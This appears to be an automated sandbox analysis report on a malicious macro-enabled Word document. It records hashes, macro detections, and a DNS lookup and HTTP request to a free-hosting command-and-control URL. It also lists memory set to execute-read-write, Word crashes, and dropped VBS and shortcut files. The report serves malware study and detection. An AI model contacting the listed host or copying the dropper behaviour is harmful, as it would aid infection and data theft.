Summary | ZeroBOX

7ebfba0b98c135481c14db1c2f2da484.docm

VBA_macro GIF Format Word 2007 file format(docx) Lnk Format ZIP Format AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6402 July 18, 2024, 10:51 a.m. July 18, 2024, 10:53 a.m.
Size 736.4KB
Type Microsoft Word 2007+
MD5 7ebfba0b98c135481c14db1c2f2da484
SHA256 d79f4ac802c50c40ecdba1aa505ed08e489524d23f7e30cce8599dbf9fcbf520
CRC32 9D7E060E
ssdeep 12288:MYsBqz0FqGrhN0kKZU3VziFhhMs2G3v0ZemkfdA45/khhMs2G3v0ZemkfdA45/v:oqz0FqGNevm35uhhMA8ZEfzFkhhMA8Z+
Yara
  • docx - Word 2007 file format detection
  • zip_file_format - ZIP file format
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Name Response Post-Analysis Lookup
koreaillmin.mypressonline.com 185.176.43.98
IP Address Status Action
164.124.101.2 Active Moloch
185.176.43.98 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:63709 -> 164.124.101.2:53 2039804 ET INFO Observed Free Hosting Domain (mypressonline .com) in DNS Lookup Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x68cc85c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 69726980
registers.edi: 69727144
registers.eax: 69726980
registers.ebp: 69727060
registers.edx: 0
registers.ebx: 69728196
registers.esi: 2147942523
registers.ecx: 2147483648
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x68cef7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xf3202 mso+0xff6108 @ 0x709c6108
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2fbc1602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2fbc159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 4178964
registers.edi: 4179128
registers.eax: 4178964
registers.ebp: 4179044
registers.edx: 0
registers.ebx: 4180180
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
request GET http://koreaillmin.mypressonline.com/file/upload/list.php?query=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007c4000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x69054000
process_handle: 0xffffffff
1 0 0
Application Crash Process WINWORD.EXE with pid 1636 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x68cc85c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 69726980
registers.edi: 69727144
registers.eax: 69726980
registers.ebp: 69727060
registers.edx: 0
registers.ebx: 69728196
registers.esi: 2147942523
registers.ecx: 2147483648
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x68cef7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xf3202 mso+0xff6108 @ 0x709c6108
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2fbc1602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2fbc159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 4178964
registers.edi: 4179128
registers.eax: 4178964
registers.ebp: 4179044
registers.edx: 0
registers.ebx: 4180180
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$bfba0b98c135481c14db1c2f2da484.docm
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\version.vbs.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Templates\~$ersion.vbs
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000454
filepath: C:\Users\test22\AppData\Local\Temp\~$bfba0b98c135481c14db1c2f2da484.docm
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
